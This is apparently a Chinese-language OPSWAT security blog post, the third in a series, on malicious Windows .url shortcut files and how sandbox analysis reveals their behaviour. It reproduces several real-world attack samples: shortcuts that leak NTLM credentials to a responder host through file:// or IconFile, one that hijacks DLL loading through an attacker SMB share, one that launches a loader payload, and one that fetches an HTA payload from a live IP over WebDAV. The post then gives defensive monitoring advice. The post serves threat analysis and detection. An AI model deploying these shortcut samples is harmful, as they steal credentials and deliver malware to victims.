通往恶意的捷径，第 3 部分：使用MetaDefender Sandbox对 URL 文件进行行为分析

静态检查揭示的是文件的内容，而动态分析告诉我们的是文件的功能。说到互联网快捷方式文件（.url），这一区别至关重要。这些文件在磁盘上看似无害，但往往是多阶段恶意软件活动的触发点--执行远程有效载荷、窃取凭证或启用持久性。

在有关 URL 文件威胁的系列文章的第三篇，也是最后一篇中，我们将重点关注动态行为：.url 文件在现实世界中是如何运行的，以及它们揭示了哪些执行后活动。这种行为视角最好通过 MetaDefender Sandbox，OPSWAT的恶意软件引爆环境，该环境可以模拟最终用户交互，并揭示静态扫描无法检测到的执行路径。

您可以从以下选项中选择查看前两篇博客：

• 第 1 部分：通往恶意的捷径：为什么 URL 文件再次成为网络威胁的焦点？
• 第 2 部分：通往恶意的捷径：恶意 URL 文件的静态分析及其背后的技巧

静态分析会标记出可疑的格式，但MetaDefender Sandbox 会捕获表明真正入侵的运行时行为，例如

• DNS 查询或攻击者基础设施的 HTTP 外向连接
• 调用 Windows 组件（如 mshta.exe、wscript.exe）启动有效载荷
• 将文件写入自动启动位置或 Windows 注册表
• 泄漏 NTLM 凭据的 SMB 身份验证尝试
• 尝试 SMB 失败后通过 HTTP/80 进行 WebDAV 回退通信

对 URL 文件滥用大局的另一个贡献发生在 2018 年，这次涉及信息泄露以及 URL 文件在远程攻击者获取身份验证和凭证材料方面发挥作用的可能性。 

五月份 Securify 指出了几种可以诱骗 Windows 子系统向攻击者控制的主机发送用户 NTLM 凭据的方法。他们披露了两种使用 URL 文件的方法，比如这种简单的方法，只需使用 file:// 前缀来引用远程文件： 

[InternetShortcut] 

URL=file://<responder ip>/leak/leak.html

......以及本示例，使用 IconFile 选项触发 URL 处理程序检索远程图标文件以提取图像进行渲染：

[InternetShortcut] 

URL=https://securify.nl 

IconIndex=0 

IconFile=\\<responder ip>\leak\leak.ico

就第二种情况而言，显然有许多值得关注的因素，包括协议前缀的可选择性、正斜杠或反斜杠的互换使用，以及 SMB 作为通过冒险访问攻击者基础架构来提升权限的意外渠道的整体持续性，这些因素都汇聚在操作系统中常见的攻击面中。

Alex Inführ稍后也讨论了这种使用 IconFile 选项访问凭据的方法。如前所述，当这些 URL 文件被激活时，就会启动与远程服务器的 SMB 连接，从而进行身份验证交换，并向攻击者披露 NTLM 凭据数据。Responder 是众多威胁行为者在此类攻击的远程端使用的常用对抗工具包。

Inführ 在讨论滥用 URL 文件中的字段，通过 DLL 侧载执行不受信任的代码时，披露了 URL 文件可能被滥用的另一个方面。在这个概念验证中，URL 文件被用来指向易受 DLL 搜索路径劫持影响的本地可执行文件；激活 URL 文件后，WorkingDirectory 选项会被处理，导致加载 DLL 的搜索路径被设置为包括远程 SMB 共享上由攻击者控制的目录。

[互联网快捷方式]
URL=C:\windows\...\mscorsvw.exe
WorkingDirectory=\attacker[.]com\SMBShare\

正如 Zscaler ThreatLabz 对 DBatLoader 用于传播 Remcos 和 Formbook RAT 的分析等恶意软件活动所记录的那样，URL 文件是一种快捷文件，也可用于在系统上执行。  

当链接到自动启动位置时，这些文件还支持一种持久手段，使恶意软件能够在重启或登录后执行。在这次传播活动中使用了以下 URL 文件，使 Xdfiifag.exe 中的恶意软件有效载荷得以启动。

[互联网快捷方式]
URL=file: "C:\Users\Public\Libraries\Xdfiifag.exe"
图标索引=13
热键=49

2023 年 6 月，@AnFam17 分享了有关基于社交工程的登陆流量重定向器的信息，该重定向器通过 URL 文件将用户分发到 NetSupport RAT 的负载。基于社交工程的上游登陆页面与一个名为 FakeSG 的工具包有关。URL 文件示例（Install Updater (msi-stable(V102.84.3348).url)： 

[互联网快捷方式]
URL=file:\\94.158.247.6@80\Downloads\updatermsi.hta
显示命令=7
图标索引=247
IconFile=C:\Windows\System32\shell32.dll

该 URL 文件与之前的迭代一样，说明了 file:// 协议前缀的表示方法可以非常灵活，这里使用的是反斜线而不是正斜线，这对检测工程师来说是一个挑战。

值得注意的是，与之前提到的使用文件前缀的 URL 文件类似，这里也存在固有的不一致性。在这些 URL 中，攻击者将有效载荷托管在 WebDAV 服务器上，导致内容不是通过 SMB 而是通过 HTTP 在 80/tcp 端口上使用 WebDAV 协议进行检索。

与此话题相关的另一个值得注意的事例发生在另一个备受关注的漏洞CVE-2023-36884 的披露前后，该漏洞于 2023 年 7 月公开披露。当时这是一个 0 天漏洞，有报告称该漏洞被用于有针对性的攻击活动，被一个威胁组织用于传播RomComRAT 的修改变种。  

复杂、多阶段的威胁链让人们重新关注 URL 文件处理这一主题，并浮现出通过 WebDAV 访问 ZIP 存档路径加载有效载荷时未检查远程代码执行的观察结果。 

通过对互联网快捷方式（URL 文件）滥用空间的回顾，我们可以发现，多年来，它们在威胁环境中一直扮演着一定的角色，尽管只是配角，而很少成为主角。通常情况下，使能技术和安全功能绕过被列为低严重性漏洞，有时甚至被视为非安全漏洞而被忽视，不能被供应商接受为 CVE 级别的漏洞。

很多时候，作为威胁分析人员，我们会优先考虑威胁序列中最明显的罪魁祸首，重点关注终端有效载荷以及攻击者如何对目标采取行动。然而，需要注意的是，当今的对手已经意识到，通过日益复杂的基于文件的技术手段，可以降低攻击面所带来的成本，而使用 URL 文件的攻击序列往往是在此类攻击链中使用 URL 文件的良好指标。

OPSWAT 建议各组织继续关注这一复杂和多层次的基于文件的技术领域。

• 监控对远程 URL 文件的访问尝试。各组织可能会发现，阻止访问远程托管的 URL 文件是可行的。
• 分析和检查环境中遇到的 URL 文件中的目标，查找滥用基于 file:// 协议功能的目标、引用外部 SMB 或 WebDAV 途径的目标，以及 URL、IconFile 和 WorkingDirectory 字段中的其他异常情况
• 监控和验证与外部、不受信任的基础架构的出站 SMB 和 WebDAV 会话。请注意，有许多支持 WebDAV 的服务和云存储解决方案可用，并已在威胁活动中被滥用，包括 4shared、DriveHQ 和 OpenDrive。这些服务为攻击者提供了公开可用且不可归属的服务，可在攻击潜在受害者时加以利用。
• 阻止与外部 SMB 服务的连接。多年的相关威胁活动表明，这是信息泄漏、远程代码执行和相关风险的持续根源。未来的攻击很可能会继续将这类战术武器化，尤其是针对传统操作系统版本的攻击，在这种情况下，诸如此类的控制措施有助于检测和破坏未知威胁。
• 利用我们最先进的Deep File Inspection®和 RetroHunt® 技术，比其他任何解决方案都能更深入地扫描并揭露更多的文件攻击。

这篇文章展示了 URL 文件的作用远不止快捷方式这么简单：它们会引发凭据泄露、从不具信任度的网络获取有效载荷、劫持 DLL 加载，甚至在端点上持续运行恶意软件。

唯一能确定无疑地检测到这些行为的方法就是观察它们，而这正是MetaDefender Sandbox 提供关键洞察力的地方。结合深度文件检测的强大功能和MetaDefender InSights 提供的上下文，企业可以在杀毒链的每个阶段都领先于文件传播的威胁。